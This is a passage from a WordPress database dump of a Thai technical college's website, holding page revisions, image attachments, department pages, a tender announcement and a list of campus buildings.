'2018-07-16 04:03:26', '', 1784, 'http://www.technicrayong.ac.th/1784-revision-v1/', 0, 'revision', '', 0),
(3451, 3, '2018-07-16 11:11:29', '2018-07-16 04:11:29', '', '16-7-2561 11-13-02', '', 'inherit', 'closed', 'closed', '', '16-7-2561-11-13-02', '', '', '2018-07-16 11:11:29', '2018-07-16 04:11:29', '', 1451, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/07/16-7-2561-11-13-02.jpg', 0, 'attachment', 'image/jpeg', 0),
(3452, 3, '2018-07-16 11:17:50', '2018-07-16 04:17:50', '', 'นางศิริพรรณ ยับยั้ง', '', 'inherit', 'closed', 'closed', '', '%e0%b8%99%e0%b8%b2%e0%b8%87%e0%b8%a8%e0%b8%b4%e0%b8%a3%e0%b8%b4%e0%b8%9e%e0%b8%a3%e0%b8%a3%e0%b8%93-%e0%b8%a2%e0%b8%b1%e0%b8%9a%e0%b8%a2%e0%b8%b1%e0%b9%89%e0%b8%87', '', '', '2018-07-16 11:17:50', '2018-07-16 04:17:50', '', 1451, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/07/นางศิริพรรณ-ยับยั้ง.jpg', 0, 'attachment', 'image/jpeg', 0),
(3453, 3, '2018-07-16 11:18:45', '2018-07-16 04:18:45', '<img class=\"aligncenter wp-image-1454 size-full\" src=\"/wp-content/uploads/2018/03/5-3-2561-10-23-29.jpg\" alt=\"\" width=\"190\" height=\"238\" />\r\n\r\n<img class=\"aligncenter wp-image-1452 \" src=\"/wp-content/uploads/2018/03/นายกิตติพงค์-อุตตมะเวทิน.jpg\" alt=\"\" width=\"376\" height=\"104\" /><a href=\"/งานบริหารงานทั่วไป\">\r\n<img class=\"aligncenter size-full wp-image-3451\" src=\"/wp-content/uploads/2018/07/16-7-2561-11-13-02.jpg\" alt=\"\" width=\"195\" height=\"243\" /><img class=\"aligncenter wp-image-1456\" src=\"/wp-content/uploads/2018/03/นางรุจิรดานันท์-พันกาฬสินธุ์.jpg\" alt=\"\" width=\"382\" height=\"107\" /></a><a href=\"/งานบุคลากร\"><img class=\"aligncenter wp-image-2067 size-full\" src=\"/wp-content/uploads/2018/05/2-5-2561-13-59-36-2.jpg\" alt=\"\" width=\"913\" height=\"318\" /></a>\r\n\r\n<img class=\"aligncenter size-full wp-image-3452\" src=\"/wp-content/uploads/2018/07/นางศิริพรรณ-ยับยั้ง.jpg\" alt=\"\" width=\"196\" height=\"242\" />\r\n\r\n<img class=\"aligncenter wp-image-3379\" src=\"/wp-content/uploads/2018/07/10-7-2561-10-06-54.jpg\" alt=\"\" width=\"371\" height=\"101\" /> <img class=\"aligncenter size-full wp-image-3386\" src=\"/wp-content/uploads/2018/07/10-7-2561-10-29-52.jpg\" alt=\"\" width=\"691\" height=\"331\" />\r\n\r\n<a href=\"/งานการเงิน\"><img class=\"aligncenter wp-image-1600 size-full\" src=\"/wp-content/uploads/2018/03/7-3-2561-13-06-42.jpg\" alt=\"\" width=\"196\" height=\"244\" /></a>\r\n\r\n<a href=\"/งานการเงิน\"><img class=\"aligncenter wp-image-1473\" src=\"/wp-content/uploads/2018/03/5-3-2561-12-34-40.jpg\" alt=\"\" width=\"375\" height=\"100\" /></a>\r\n\r\n<img class=\"aligncenter wp-image-1590 size-full\" src=\"/wp-content/uploads/2018/03/5-3-2561-12-44-12.jpg\" alt=\"\" width=\"675\" height=\"311\" />\r\n\r\n<a href=\"/งานการบัญชี\"><img class=\"aligncenter wp-image-1603 size-full\" src=\"/wp-content/uploads/2018/03/7-3-2561-13-11-03.jpg\" alt=\"\" width=\"193\" height=\"239\" /></a>\r\n\r\n<a href=\"/งานการบัญชี\"><img class=\"aligncenter wp-image-1478\" src=\"/wp-content/uploads/2018/03/5-3-2561-12-52-08.jpg\" alt=\"\" width=\"375\" height=\"104\" /></a>\r\n\r\n<img class=\"aligncenter wp-image-1592 size-full\" src=\"/wp-content/uploads/2018/03/5-3-2561-13-22-38.jpg\" alt=\"\" width=\"455\" height=\"323\" />\r\n\r\n<img class=\"aligncenter wp-image-3382\" src=\"/wp-content/uploads/2018/07/145623013221.jpg\" alt=\"\" width=\"370\" height=\"101\" /> <img class=\"aligncenter wp-image-3383 size-full\" src=\"/wp-content/uploads/2018/07/10-7-2561-10-25-00.jpg\" alt=\"\" width=\"780\" height=\"645\" />\r\n\r\n<a href=\"/งานอาคารสถานที่\"><img class=\"aligncenter wp-image-1614 size-full\" src=\"/wp-content/uploads/2018/03/7-3-2561-13-37-08.jpg\" alt=\"\" width=\"194\" height=\"238\" /></a>\r\n\r\n<a href=\"/งานอาคารสถานที่\"><img class=\"aligncenter wp-image-1493\" src=\"/wp-content/uploads/2018/03/5-3-2561-14-52-41.jpg\" alt=\"\" width=\"382\" height=\"102\" /></a>\r\n\r\n<img class=\"aligncenter size-full wp-image-3388\" src=\"/wp-content/uploads/2018/07/10-7-2561-10-33-19.jpg\" alt=\"\" width=\"279\" height=\"339\" />\r\n<h6><a href=\"/งานทะเบียน\"><img class=\"aligncenter wp-image-1619 size-full\" src=\"/wp-content/uploads/2018/03/7-3-2561-13-46-48.jpg\" alt=\"\" width=\"193\" height=\"238\" /></a><a href=\"/งานทะเบียน\"><img class=\"aligncenter wp-image-1496\" src=\"/wp-content/uploads/2018/03/5-3-2561-15-42-18.jpg\" alt=\"\" width=\"384\" height=\"105\" /></a></h6>\r\n<img class=\"aligncenter wp-image-1620 size-full\" src=\"/wp-content/uploads/2018/03/7-3-2561-13-50-20.jpg\" alt=\"\" width=\"743\" height=\"630\" />\r\n\r\n<a href=\"/งานประชาสัมพันธ์\"><img class=\"aligncenter wp-image-1623 size-full\" src=\"/wp-content/uploads/2018/03/7-3-2561-14-12-02.jpg\" alt=\"\" width=\"195\" height=\"241\" /></a>\r\n\r\n<a href=\"/งานประชาสัมพันธ์\"><img class=\"aligncenter wp-image-1503\" src=\"/wp-content/uploads/2018/03/6-3-2561-9-34-49.jpg\" alt=\"\" width=\"362\" height=\"98\" /></a>\r\n\r\n<img class=\"aligncenter wp-image-1626 size-full\" src=\"/wp-content/uploads/2018/03/7-3-2561-14-17-46.jpg\" alt=\"\" width=\"244\" height=\"311\" />\r\n\r\n \r\n\r\n \r\n\r\n ', 'โครงสร้างฝ่ายบริหารทรัพยากร', '', 'inherit', 'closed', 'closed', '', '1451-revision-v1', '', '', '2018-07-16 11:18:45', '2018-07-16 04:18:45', '', 1451, 'http://www.technicrayong.ac.th/1451-revision-v1/', 0, 'revision', '', 0),
(3455, 3, '2018-07-16 11:19:44', '2018-07-16 04:19:44', '<img class=\"aligncenter size-full wp-image-1485\" src=\"/wp-content/uploads/2018/03/5-3-2561-13-45-54.jpg\" alt=\"\" width=\"195\" height=\"238\" />\r\n\r\n<img class=\"aligncenter size-full wp-image-3451\" src=\"/wp-content/uploads/2018/07/16-7-2561-11-13-02.jpg\" alt=\"\" width=\"195\" height=\"243\" />\r\n\r\n<img class=\"aligncenter wp-image-1456 \" src=\"/wp-content/uploads/2018/03/นางรุจิรดานันท์-พันกาฬสินธุ์.jpg\" alt=\"\" width=\"369\" height=\"103\" />\r\n\r\n<img class=\"aligncenter wp-image-2067 size-full\" src=\"/wp-content/uploads/2018/05/2-5-2561-13-59-36-2.jpg\" alt=\"\" width=\"913\" height=\"318\" />', 'งานบริหารงานทั่วไป', '', 'inherit', 'closed', 'closed', '', '1512-revision-v1', '', '', '2018-07-16 11:19:44', '2018-07-16 04:19:44', '', 1512, 'http://www.technicrayong.ac.th/1512-revision-v1/', 0, 'revision', '', 0),
(3457, 3, '2018-07-16 11:21:24', '2018-07-16 04:21:24', '<img class=\"aligncenter size-full wp-image-3452\" src=\"/wp-content/uploads/2018/07/นางศิริพรรณ-ยับยั้ง.jpg\" alt=\"\" width=\"196\" height=\"242\" />\r\n\r\n<img class=\"aligncenter wp-image-3379\" src=\"/wp-content/uploads/2018/07/10-7-2561-10-06-54.jpg\" alt=\"\" width=\"371\" height=\"101\" />\r\n\r\n<img class=\"aligncenter size-full wp-image-3386\" src=\"/wp-content/uploads/2018/07/10-7-2561-10-29-52.jpg\" alt=\"\" width=\"691\" height=\"331\" />\r\n<h3><span style=\"color: #0000ff;\">**</span><span style=\"color: #0000ff;\">ข้อมูลบุคลากร ปี 2560 <a href=\"/%E0%B8%82%E0%B9%89%E0%B8%AD%E0%B8%A1%E0%B8%B9%E0%B8%A5%E0%B8%9A%E0%B8%B8%E0%B8%84%E0%B8%A5%E0%B8%B2%E0%B8%81%E0%B8%A360/\"><span style=\"color: #ff0000;\">คลิกที่นี่</span></a></span></h3>\r\n<h3><span style=\"color: #339966;\">**คำสั่งวิทยาลัยเทคนิคระยอง ที่ ๒๔๖๘ / ๒๕๖๐ เรื่อง แต่งตั้งข้าราชการครู ลูกจ้างประจำ พนักงานราชการ </span><span style=\"color: #339966;\">และลูกจ้างชั่วคราว ให้ทำหน้าที่ และปฏิบัติหน้าที่รับผิดชอบ <a href=\"/คำสั่งแต่งตั้ง-2468-2560\"><span style=\"color: #ff0000;\">คลิกที่นี่</span></a></span></h3>\r\n<h3><span style=\"color: #800080;\"><strong>**หลักเกณฑ์และวิธีปฏิบัติในการจัดข้าราชการเข้าพักอาศัยในที่พักของทางราชการ </strong></span><span style=\"color: #339966;\"><span style=\"color: #ff0000;\">คลิกที่นี่</span></span></h3>\r\n<h3><a href=\"/wp-content/uploads/2018/05/แบบฟอร์ม-ขออนุญาตไปราชการวิทยาลัย.pdf\">**แบบฟอร์มขออนุญาตไปราชการวิทยาลัย</a></h3>\r\n<h3>**การประเมินตนเองและการจัดทำแผนพัฒนาตนเอง(ID PLAN) <a href=\"/%E0%B8%81%E0%B8%B2%E0%B8%A3%E0%B8%9B%E0%B8%A3%E0%B8%B0%E0%B9%80%E0%B8%A1%E0%B8%B4%E0%B8%99%E0%B8%95%E0%B8%99%E0%B9%80%E0%B8%AD%E0%B8%87%E0%B9%81%E0%B8%A5%E0%B8%B0%E0%B8%81%E0%B8%B2%E0%B8%A3%E0%B8%88/?preview_id=3020&preview_nonce=9d43a6f5df&_thumbnail_id=-1&preview=true\"><span style=\"color: #ff0000;\">คลิกที่นี่</span></a></h3>\r\n ', 'งานบุคลากร', '', 'inherit', 'closed', 'closed', '', '1516-revision-v1', '', '', '2018-07-16 11:21:24', '2018-07-16 04:21:24', '', 1516, 'http://www.technicrayong.ac.th/1516-revision-v1/', 0, 'revision', '', 0),
(3459, 3, '2018-07-16 11:27:32', '2018-07-16 04:27:32', '', '16-7-2561 11-29-11', '', 'inherit', 'closed', 'closed', '', '16-7-2561-11-29-11', '', '', '2018-07-16 11:27:32', '2018-07-16 04:27:32', '', 1588, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/07/16-7-2561-11-29-11.jpg', 0, 'attachment', 'image/jpeg', 0),
(3460, 3, '2018-07-16 11:28:24', '2018-07-16 04:28:24', '<img class=\"aligncenter size-full wp-image-1485\" src=\"/wp-content/uploads/2018/03/5-3-2561-13-45-54.jpg\" alt=\"\" width=\"195\" height=\"238\" />\r\n\r\n<img class=\"aligncenter size-full wp-image-2797\" src=\"/wp-content/uploads/2018/05/30-5-2561-9-22-41.jpg\" alt=\"\" width=\"192\" height=\"239\" />\r\n\r\n<img class=\"aligncenter wp-image-1631 \" src=\"/wp-content/uploads/2018/03/7-3-2561-14-39-06.jpg\" alt=\"\" width=\"376\" height=\"101\" />\r\n\r\n<a href=\"/%E0%B8%87%E0%B8%B2%E0%B8%99%E0%B8%A7%E0%B8%B2%E0%B8%87%E0%B9%81%E0%B8%9C%E0%B8%99%E0%B9%81%E0%B8%A5%E0%B8%B0%E0%B8%87%E0%B8%9A%E0%B8%9B%E0%B8%A3%E0%B8%B0%E0%B8%A1%E0%B8%B2%E0%B8%93/\"><img class=\"aligncenter wp-image-1632 size-full\" src=\"/wp-content/uploads/2018/03/7-3-2561-14-34-46.jpg\" alt=\"\" width=\"193\" height=\"246\" /></a>\r\n\r\n<a href=\"/งานวางแผนและความร่วมมื\"><img class=\"aligncenter wp-image-1633\" src=\"/wp-content/uploads/2018/03/7-3-2561-14-39-27.jpg\" alt=\"\" width=\"375\" height=\"102\" /></a>\r\n\r\n<img class=\"aligncenter wp-image-1654 size-full\" src=\"/wp-content/uploads/2018/03/7-3-2561-15-24-55.jpg\" alt=\"\" width=\"246\" height=\"308\" />\r\n\r\n<a href=\"/%E0%B8%87%E0%B8%B2%E0%B8%99%E0%B8%A8%E0%B8%B9%E0%B8%99%E0%B8%A2%E0%B9%8C%E0%B8%82%E0%B9%89%E0%B8%AD%E0%B8%A1%E0%B8%B9%E0%B8%A5/\"><img class=\"aligncenter wp-image-2799 size-full\" src=\"/wp-content/uploads/2018/05/30-5-2561-9-51-29.jpg\" alt=\"\" width=\"192\" height=\"239\" /></a>\r\n\r\n<img class=\"aligncenter size-full wp-image-1485\" src=\"/wp-content/uploads/2018/03/5-3-2561-13-45-54.jpg\" alt=\"\" width=\"195\" height=\"238\" />\r\n\r\n<a href=\"/%E0%B8%87%E0%B8%B2%E0%B8%99%E0%B8%A8%E0%B8%B9%E0%B8%99%E0%B8%A2%E0%B9%8C%E0%B8%82%E0%B9%89%E0%B8%AD%E0%B8%A1%E0%B8%B9%E0%B8%A5/\"><img class=\"aligncenter wp-image-1635\" src=\"/wp-content/uploads/2018/03/7-3-2561-14-43-12-300x79.jpg\" alt=\"\" width=\"376\" height=\"99\" /></a>\r\n\r\n<img class=\"aligncenter size-full wp-image-3459\" src=\"/wp-content/uploads/2018/07/16-7-2561-11-29-11.jpg\" alt=\"\" width=\"294\" height=\"333\" />\r\n\r\n<img class=\"aligncenter size-full wp-image-1638\" src=\"/wp-content/uploads/2018/03/7-3-2561-14-49-01.jpg\" alt=\"\" width=\"194\" height=\"241\" />\r\n\r\n<img class=\"aligncenter wp-image-1639\" src=\"/wp-content/uploads/2018/03/7-3-2561-14-49-18-300x80.jpg\" alt=\"\" width=\"376\" height=\"100\" />\r\n\r\n<img class=\"aligncenter size-full wp-image-3393\" src=\"/wp-content/uploads/2018/07/65424786453.jpg\" alt=\"\" width=\"228\" height=\"333\" />\r\n\r\n<img class=\"aligncenter size-full wp-image-1642\" src=\"/wp-content/uploads/2018/03/7-3-2561-14-57-37.jpg\" alt=\"\" width=\"202\" height=\"239\" />\r\n\r\n<img class=\"aligncenter wp-image-1643\" src=\"/wp-content/uploads/2018/03/7-3-2561-14-53-30-300x81.jpg\" alt=\"\" width=\"376\" height=\"101\" />\r\n\r\n<img class=\"aligncenter size-medium wp-image-1657\" src=\"/wp-content/uploads/2018/03/7-3-2561-15-26-35-223x300.jpg\" alt=\"\" width=\"223\" height=\"300\" />\r\n\r\n<img class=\"aligncenter size-full wp-image-1646\" src=\"/wp-content/uploads/2018/03/7-3-2561-15-01-21.jpg\" alt=\"\" width=\"195\" height=\"239\" />\r\n\r\n<img class=\"aligncenter wp-image-1647\" src=\"/wp-content/uploads/2018/03/7-3-2561-15-01-34-300x80.jpg\" alt=\"\" width=\"376\" height=\"101\" />\r\n\r\n<img class=\"aligncenter wp-image-1648 size-full\" src=\"/wp-content/uploads/2018/03/7-3-2561-15-05-03.jpg\" alt=\"\" width=\"506\" height=\"323\" />\r\n\r\n<img class=\"aligncenter size-full wp-image-1652\" src=\"/wp-content/uploads/2018/03/7-3-2561-15-22-50.jpg\" alt=\"\" width=\"191\" height=\"237\" />\r\n\r\n<img class=\"aligncenter wp-image-1650\" src=\"/wp-content/uploads/2018/03/7-3-2561-15-21-54-300x81.jpg\" alt=\"\" width=\"376\" height=\"102\" />\r\n\r\n<img class=\"aligncenter wp-image-1755 size-full\" src=\"/wp-content/uploads/2018/03/12-3-2561-14-57-21.jpg\" alt=\"\" width=\"574\" height=\"318\" />\r\n\r\n \r\n\r\n ', 'โครงสร้างฝ่ายแผนงานและความร่วมมือ', '', 'inherit', 'closed', 'closed', '', '1588-revision-v1', '', '', '2018-07-16 11:28:24', '2018-07-16 04:28:24', '', 1588, 'http://www.technicrayong.ac.th/1588-revision-v1/', 0, 'revision', '', 0),
(3462, 3, '2018-07-16 11:30:09', '2018-07-16 04:30:09', '<img class=\"aligncenter size-full wp-image-2799\" src=\"/wp-content/uploads/2018/05/30-5-2561-9-51-29.jpg\" alt=\"\" width=\"192\" height=\"239\" />\r\n\r\n<img class=\"aligncenter wp-image-1743\" src=\"/wp-content/uploads/2018/03/7-3-2561-14-43-12-1-300x79.jpg\" alt=\"\" width=\"376\" height=\"99\" />\r\n\r\n<img class=\"aligncenter size-full wp-image-3459\" src=\"/wp-content/uploads/2018/07/16-7-2561-11-29-11.jpg\" alt=\"\" width=\"294\" height=\"333\" />\r\n<h3><span style=\"color: #ff00ff;\"><a style=\"color: #ff00ff;\" href=\"/wp-content/uploads/2018/06/พระราชบัญญัติว่าด้วยการกระทำความผิดเกี่ยวกับคอมพิวเตอร์-พ.ศ.๒๕๕๐.pptx\">พระราชบัญญัติว่าด้วยการกระทำความผิดเกี่ยวกับคอมพิวเตอร์ พ.ศ.๒๕๕๐</a></span></h3>\r\n<h3><span style=\"color: #ff00ff;\"><a style=\"color: #ff00ff;\" href=\"/wp-content/uploads/2018/06/ระเบียบการใช้คอมพิวเตอร์และอินเตอร์เน็ต-ปี-2558.pdf\">ระเบียบการใช้คอมพิวเตอร์และอินเตอร์เน็ต ปี ๒๕๕๘</a></span></h3>\r\n<h3><span style=\"color: #ff00ff;\"><a style=\"color: #ff00ff;\" href=\"/wp-content/uploads/2018/06/2_หลักเกณฑ์การเก็บรักษาข้อมูลจราจรทางคอมพิวเตอร์.ppt\">หลักเกณฑ์การเก็บรักษาข้อมูลจราจรทางคอมพิวเตอร์</a></span></h3>\r\n<h3><a href=\"/wp-content/uploads/2018/06/แบบฟอร์มขอใช้-INTERNET-สำหรับบุคลากรทางการศึกษา.docx\">แบบฟอร์มขอใช้ INTERNET (สำหรับบุคลากรทางการศึกษา)</a></h3>\r\n<h3><a href=\"/ขั้นตอนการเปลี่ยน-password\"><span style=\"color: #800000;\">ขั้นตอนการเปลี่ยน PASSWORD สำหรับใช้งานอินเตอร์เน็ต (ภายในวิทยาลัยฯ)</span></a></h3>\r\n<h3><span style=\"color: #008000;\"><a style=\"color: #008000;\" href=\"/%E0%B8%82%E0%B9%89%E0%B8%AD%E0%B8%A1%E0%B8%B9%E0%B8%A5%E0%B8%99%E0%B8%B1%E0%B8%81%E0%B9%80%E0%B8%A3%E0%B8%B5%E0%B8%A2%E0%B8%99%E0%B8%99%E0%B8%B1%E0%B8%81%E0%B8%A8%E0%B8%B6%E0%B8%81%E0%B8%A9%E0%B8%B260/\">ข้อมูลนักเรียน นักศึกษา</a></span></h3>\r\n<h3><span style=\"color: #008000;\">ข้อมูลบุคลากร</span></h3>\r\n ', 'งานศูนย์ข้อมูลสารสนเทศ', '', 'inherit', 'closed', 'closed', '', '1741-revision-v1', '', '', '2018-07-16 11:30:09', '2018-07-16 04:30:09', '', 1741, 'http://www.technicrayong.ac.th/1741-revision-v1/', 0, 'revision', '', 0),
(3464, 3, '2018-07-17 09:27:52', '2018-07-17 02:27:52', '', '17-7-2561 9-08-40', '', 'inherit', 'closed', 'closed', '', '17-7-2561-9-08-40', '', '', '2018-07-17 09:27:52', '2018-07-17 02:27:52', '', 2388, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/07/17-7-2561-9-08-40.jpg', 0, 'attachment', 'image/jpeg', 0),
(3465, 3, '2018-07-17 09:27:59', '2018-07-17 02:27:59', '', '17-7-2561 9-09-04', '', 'inherit', 'closed', 'closed', '', '17-7-2561-9-09-04', '', '', '2018-07-17 09:27:59', '2018-07-17 02:27:59', '', 2388, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/07/17-7-2561-9-09-04.jpg', 0, 'attachment', 'image/jpeg', 0),
(3466, 3, '2018-07-17 09:28:04', '2018-07-17 02:28:04', '', '17-7-2561 9-09-27', '', 'inherit', 'closed', 'closed', '', '17-7-2561-9-09-27', '', '', '2018-07-17 09:28:04', '2018-07-17 02:28:04', '', 2388, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/07/17-7-2561-9-09-27.jpg', 0, 'attachment', 'image/jpeg', 0),
(3467, 3, '2018-07-17 09:28:43', '2018-07-17 02:28:43', '<img class=\"aligncenter wp-image-2389 size-full\" src=\"/wp-content/uploads/2018/05/8-5-2561-10-32-12.jpg\" alt=\"\" width=\"189\" height=\"238\" />\r\n\r\n<img class=\"aligncenter wp-image-2390\" src=\"/wp-content/uploads/2018/05/8-5-2561-10-33-02.jpg\" alt=\"\" width=\"379\" height=\"101\" />\r\n\r\n<img class=\"aligncenter size-full wp-image-3464\" src=\"/wp-content/uploads/2018/07/17-7-2561-9-08-40.jpg\" alt=\"\" width=\"955\" height=\"638\" /> <img class=\"aligncenter size-full wp-image-3465\" src=\"/wp-content/uploads/2018/07/17-7-2561-9-09-04.jpg\" alt=\"\" width=\"955\" height=\"632\" /> <img class=\"aligncenter size-full wp-image-3466\" src=\"/wp-content/uploads/2018/07/17-7-2561-9-09-27.jpg\" alt=\"\" width=\"948\" height=\"317\" />', 'ช่างอิเล็กทรอนิกส์', '', 'inherit', 'closed', 'closed', '', '2388-revision-v1', '', '', '2018-07-17 09:28:43', '2018-07-17 02:28:43', '', 2388, 'http://www.technicrayong.ac.th/2388-revision-v1/', 0, 'revision', '', 0),
(3469, 3, '2018-07-18 13:01:54', '2018-07-18 06:01:54', '[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2018%2F07%2F%E0%B8%9B%E0%B8%A3%E0%B8%B0%E0%B8%81%E0%B8%B2%E0%B8%A8-%E0%B8%A3%E0%B8%B2%E0%B8%A2%E0%B8%8A%E0%B8%B7%E0%B9%88%E0%B8%AD%E0%B8%9C%E0%B8%B9%E0%B9%89%E0%B8%8A%E0%B8%99%E0%B8%B0%E0%B8%9B%E0%B8%A3%E0%B8%B0%E0%B8%81%E0%B8%A7%E0%B8%94%E0%B8%A3%E0%B8%B2%E0%B8%84%E0%B8%B2-%E0%B9%82%E0%B8%94%E0%B8%A1%E0%B8%9E%E0%B8%A3%E0%B8%B0%E0%B8%A7%E0%B8%B4%E0%B8%A9%E0%B8%93%E0%B8%B8.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]', 'ประกาศ รายชื่อผู้ชนะการเสนอราคาประกวดราคาจ้างปรับปรุงพื้นบริเวณโดมหน้าองค์พระวิษณุ จำนวน 1 งาน', '', 'publish', 'closed', 'open', '', '%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%81%e0%b8%b2%e0%b8%a8-%e0%b8%a3%e0%b8%b2%e0%b8%a2%e0%b8%8a%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%9c%e0%b8%b9%e0%b9%89%e0%b8%8a%e0%b8%99%e0%b8%b0%e0%b8%81%e0%b8%b2-3', '', '', '2018-07-18 13:01:54', '2018-07-18 06:01:54', '', 0, 'http://www.technicrayong.ac.th/?p=3469', 364, 'post', '', 0),
(3470, 3, '2018-07-18 13:00:32', '2018-07-18 06:00:32', '', 'ประกาศ รายชื่อผู้ชนะประกวดราคา โดมพระวิษณุ', '', 'inherit', 'closed', 'closed', '', '%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%81%e0%b8%b2%e0%b8%a8-%e0%b8%a3%e0%b8%b2%e0%b8%a2%e0%b8%8a%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%9c%e0%b8%b9%e0%b9%89%e0%b8%8a%e0%b8%99%e0%b8%b0%e0%b8%9b%e0%b8%a3%e0%b8%b0', '', '', '2018-07-18 13:00:32', '2018-07-18 06:00:32', '', 3469, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/07/ประกาศ-รายชื่อผู้ชนะประกวดราคา-โดมพระวิษณุ.pdf', 0, 'attachment', 'application/pdf', 0),
(3471, 3, '2018-07-18 13:01:54', '2018-07-18 06:01:54', '[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2018%2F07%2F%E0%B8%9B%E0%B8%A3%E0%B8%B0%E0%B8%81%E0%B8%B2%E0%B8%A8-%E0%B8%A3%E0%B8%B2%E0%B8%A2%E0%B8%8A%E0%B8%B7%E0%B9%88%E0%B8%AD%E0%B8%9C%E0%B8%B9%E0%B9%89%E0%B8%8A%E0%B8%99%E0%B8%B0%E0%B8%9B%E0%B8%A3%E0%B8%B0%E0%B8%81%E0%B8%A7%E0%B8%94%E0%B8%A3%E0%B8%B2%E0%B8%84%E0%B8%B2-%E0%B9%82%E0%B8%94%E0%B8%A1%E0%B8%9E%E0%B8%A3%E0%B8%B0%E0%B8%A7%E0%B8%B4%E0%B8%A9%E0%B8%93%E0%B8%B8.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]', 'ประกาศ รายชื่อผู้ชนะการเสนอราคาประกวดราคาจ้างปรับปรุงพื้นบริเวณโดมหน้าองค์พระวิษณุ จำนวน 1 งาน', '', 'inherit', 'closed', 'closed', '', '3469-revision-v1', '', '', '2018-07-18 13:01:54', '2018-07-18 06:01:54', '', 3469, 'http://www.technicrayong.ac.th/3469-revision-v1/', 0, 'revision', '', 0),
(3472, 3, '2018-07-18 13:02:12', '2018-07-18 06:02:12', '[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2018%2F07%2F%E0%B8%9B%E0%B8%A3%E0%B8%B0%E0%B8%81%E0%B8%B2%E0%B8%A8-%E0%B8%A3%E0%B8%B2%E0%B8%A2%E0%B8%8A%E0%B8%B7%E0%B9%88%E0%B8%AD%E0%B8%9C%E0%B8%B9%E0%B9%89%E0%B8%8A%E0%B8%99%E0%B8%B0%E0%B8%9B%E0%B8%A3%E0%B8%B0%E0%B8%81%E0%B8%A7%E0%B8%94%E0%B8%A3%E0%B8%B2%E0%B8%84%E0%B8%B2-%E0%B9%82%E0%B8%94%E0%B8%A1%E0%B8%9E%E0%B8%A3%E0%B8%B0%E0%B8%A7%E0%B8%B4%E0%B8%A9%E0%B8%93%E0%B8%B8.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]', 'ประกาศ รายชื่อผู้ชนะการเสนอราคาประกวดราคาจ้างปรับปรุงพื้นบริเวณโดมหน้าองค์พระวิษณุ จำนวน 1 งาน', '', 'inherit', 'closed', 'closed', '', '3469-autosave-v1', '', '', '2018-07-18 13:02:12', '2018-07-18 06:02:12', '', 3469, 'http://www.technicrayong.ac.th/3469-autosave-v1/', 0, 'revision', '', 0),
(3474, 3, '2018-07-19 15:05:47', '2018-07-19 08:05:47', '', '111111', '', 'inherit', 'closed', 'closed', '', '111111', '', '', '2018-07-19 15:05:47', '2018-07-19 08:05:47', '', 2809, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/07/111111.jpg', 0, 'attachment', 'image/jpeg', 0),
(3475, 3, '2018-07-19 15:06:14', '2018-07-19 08:06:14', '<img class=\"size-full wp-image-2815 alignleft\" src=\"/wp-content/uploads/2018/05/30-5-2561-14-14-12.jpg\" alt=\"\" width=\"193\" height=\"56\" />\r\n\r\n \r\n\r\n \r\n\r\n<img class=\"aligncenter wp-image-2821 size-full\" src=\"/wp-content/uploads/2018/05/30-5-2561-14-28-08.jpg\" alt=\"\" width=\"837\" height=\"287\" />\r\n\r\n<img class=\"wp-image-2817 size-full alignleft\" src=\"/wp-content/uploads/2018/05/30-5-2561-14-21-41.jpg\" alt=\"\" width=\"815\" height=\"261\" />\r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n<img class=\"aligncenter size-full wp-image-3474\" src=\"/wp-content/uploads/2018/07/111111.jpg\" alt=\"\" width=\"1534\" height=\"742\" />\r\n\r\n<img class=\"wp-image-2824 size-full alignleft\" src=\"/wp-content/uploads/2018/05/42566265256526.jpg\" alt=\"\" width=\"540\" height=\"44\" />\r\n\r\n \r\n\r\n \r\n<h2><span style=\"color: #ffffff;\">1. อาคารโรงยิม</span></h2>\r\n<h2></h2>\r\n<h2><span style=\"color: #800000;\">1. อาคารโรงยิม</span></h2>\r\n<h2><span style=\"color: #800000;\">2. อาคารคหกรรม</span></h2>\r\n<h2><span style=\"color: #800000;\">3. อาคารการท่องเที่ยว</span></h2>\r\n<h2><span style=\"color: #800000;\">4. อาคารสารสนเทศ</span></h2>\r\n<h2><span style=\"color: #800000;\">5. อาคารช่างเชื่อมเก่า</span></h2>\r\n<h2><span style=\"color: #800000;\">6. อาคารอิเล็กทรอนิกส์</span></h2>\r\n<h2><span style=\"color: #800000;\">7. อาคารบริหารธุรกิจ</span></h2>\r\n<h2><span style=\"color: #800000;\">8. อาคารปิโตรเคมี</span></h2>\r\n<h2><span style=\"color: #800000;\">9. อาคารโรงอาหาร</span></h2>\r\n<h2><span style=\"color: #800000;\">10. อาคารเรียนเขียนแบบ 2 ชั้น</span></h2>\r\n<h2><span style=\"color: #800000;\">11. อาคารช่างก่อสร้าง</span></h2>\r\n<h2><span style=\"color: #800000;\">12. อาคารตึกอำนวยการ</span></h2>\r\n<h2><span style=\"color: #800000;\">13. อาคาร AUA</span></h2>\r\n<h2><span style=\"color: #800000;\">14. อาคารพัสดุ</span></h2>\r\n<h2><span style=\"color: #800000;\">15. อาคารเขียนแบบเทคนิคพื้นฐาน</span></h2>\r\n<h2><span style=\"color: #800000;\">16. อาคารเรียนสามัญ</span></h2>\r\n<h2><span style=\"color: #800000;\">17. อาคารไฟฟ้ากำลัง</span></h2>\r\n<h2><span style=\"color: #800000;\">18. อาคารเทคโนโลยีอุตสาหกรรม</span></h2>\r\n<h2><span style=\"color: #800000;\">19. อาคารช่างยนต์</span></h2>\r\n<h2><span style=\"color: #800000;\">20. อาคารช่างกลโรงงาน</span></h2>\r\n<h2><span 